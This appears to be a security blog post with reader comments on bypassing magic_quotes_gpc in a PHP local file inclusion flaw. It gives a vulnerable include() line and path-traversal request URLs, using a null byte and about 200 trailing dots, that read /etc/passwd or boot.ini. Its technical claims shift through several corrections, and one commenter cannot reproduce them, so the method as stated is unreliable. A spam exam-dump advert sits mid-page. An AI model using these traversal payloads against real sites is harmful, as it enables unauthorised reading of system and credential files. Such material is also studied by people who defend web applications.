Local File Inclusion with Magic_quotes_gpc enabled

So, lets look at a piece of code:

<?php include(‘inc/’.$_GET['page'].’php’); ?>

Normally, you would use the null byte (%00) to exploit it:

vuln.php?page=../../../../../etc/passwd%00

but if magic_quote_gpc is enabled than the null byte(%00) will get converted to /0, implying that the attack will fail.

How to bypass this: it you add a large number of dots (…..) than the null byte will not get escaped null byte is not required. e.g.

vuln.php?page=../../../../../etc/passwd%00……………………………………………………………………..(200 dots in this case)

vuln.php?page=../../../../../etc/passwd……………………………………………………………………..(200 dots in this case)

Correction: You don’t need null byte here.

Update: As pointed out by Bodgan, this only works for windows. So replace /etc/passwd with /../../boot.ini. I will provide a POC link

tested on php version: 5.2.12 (wamp environment)

References: http://www.xakep.ru/post/50862/novaya_veha_v_teorii_include.rar
———————-
Advert: Download icnd training material from testking and guarantee pass your HP0-J33 as well as HP0-J34 exams on first jump.

10 Thoughts on “Local File Inclusion with Magic_quotes_gpc enabled

  1. Good one Sid!

  2. i wanna see a printscreen :)

  3. No, it’s not about the null byte. It works like this vuln.php?page=../../../../../etc/passwd….(lots of dots). With the null byte it doesn’t work.

    It only works on Windows AND it only works if the include is relative.

    If you have something like:
    include “d:\\xampp\\htdocs\\test\\” . $_GET['i'] . “.txt”; it doesn’t work.

  4. Hi Bogan,

    i have only tested it on windows, while the backslash(\) will get escaped by magic quote the forward slash will not be escaped, so that explains why it will only work if include is relational in windows.

    I can confirm that in my windows setup, it worked with null byte. As you pointed out, it doesn’t work with null byte and the null byte is actually not required.

  5. Hi,
    Very interesting only I am not able to reproduce it. I tested from 100 to > 4096 dots, this does not disable the NULL byte from being escaped.

    You say you tested on WAMP ? ie: Windows ? How can /etc/passwd work on windows ?

    I tried in windows also, and it failed. Could you please explain or give poc code ?

    Thanks

  6. Hi skully, please see the update, you dont need magic quote at all. I managed to make so many mistakes in a small blog post :(

  7. Pingback: Week 5 in Review | Infosec Events

  8. i did try whit etc/passwd%00
    but that does not work
    any ideal ?

  9. Pingback: 草名园 » PHP文件包含漏洞利用

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Post Navigation